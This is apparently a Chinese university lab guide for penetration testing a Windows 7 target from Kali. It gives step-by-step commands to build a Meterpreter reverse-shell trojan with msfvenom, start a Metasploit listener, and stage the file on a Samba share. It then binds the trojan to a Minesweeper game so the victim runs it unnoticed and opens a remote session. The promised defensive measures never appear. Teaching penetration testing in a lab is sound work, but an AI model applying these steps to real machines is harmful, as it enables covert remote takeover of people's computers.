Kali渗透Windows服务器
Kali渗透Windows服务器
一个yijing的实验
实验简介
实验所属系列:网络渗透测试
实验对象:本科/专科信息安全专业
相关课程及专业:计算机基础,Linux基础
实验时数(学分):2学时
实验类别:实践实验类
预备知识
Kali是一款开源的安全漏洞检测工具,是专用用于渗透测试的Linux操作系统,由BackTrack发展而来,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的漏洞分析情况。
实验目的
学习漏洞扫描技术基本原理,了解其在网络攻防中的作用,掌握使用Kali中的Metasploit对目标主机渗透,并根据报告做出相应的防护措施。
实验环境
靶机:Windows 7 IP随机
攻击机:Kali IP:10.1.1.102
实验步骤一
本实验通过利用kali生成后门程序,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验任务,详情如下:
1.1生成setup.exe后门程序,即木马程序
1、打开kali终端,输入
ifconfig
得到本机ip为10.1.1.102。

输入
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.102 -f exe > setup.exe

进入setup.exe所在目录,修改属性:选择“允许此文件作为程序运行”。如下图所示:

终端中首先输入
msfconsole
启动msf;
然后输入
use exploit/multi/handler
加载监听模块;
输入
set LHOST 10.1.1.102
来设置本地主机;
然后输入
exploit -z -j
开始监听,如下图所示:

建立本地共享目录
mkdir /a/share -p
进入根目录
cd /
将setup.exe移入共享文件夹
mv setup.exe /a/share

然后再修改权限
chmod 777 -R /a/share
然后在进入配置文件
/etc/samba/smb.conf

在尾部加入
[share]
path = /a/share
available = yes
browseable = yes
public = no
writable = yes

接着再终端建立用户
useradd a
smbpasswd -a a

启动
/etc/init.d/smbd restart

实验步骤二
可以在windows系统下使用exe捆绑软件将setup.exe和一个其他的某个安全软件合并为一个软件,这样在运行软件时两个软件同时运行,不会引起注意。在C盘tools文件夹里找到与实验名同名的文件,先打开ExeBinder.exe捆绑软件。选择第一个要合并的软件,默认选择本软件中自带的小游戏程序:


将setup.exe和扫雷.exe绑定


将绑定后的文件放置桌面,点击运行

实验步骤三
目标主机执行程序后,在kali终端中的检测程序会及时检测到。在检测到目标主机运行程序后,后门程序会反向连接到msf,之后msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。输入
sessions
可以看到目标主机的ip为10.1.1.100。

再继续输入
sessions -i 1
之后可以对目标主机进行一系列的操作。
如输入
sysinfo
可知道目标主机的系统信息;

输入
getuid
查看对方正在运行的用户。


浙公网安备 33010602011771号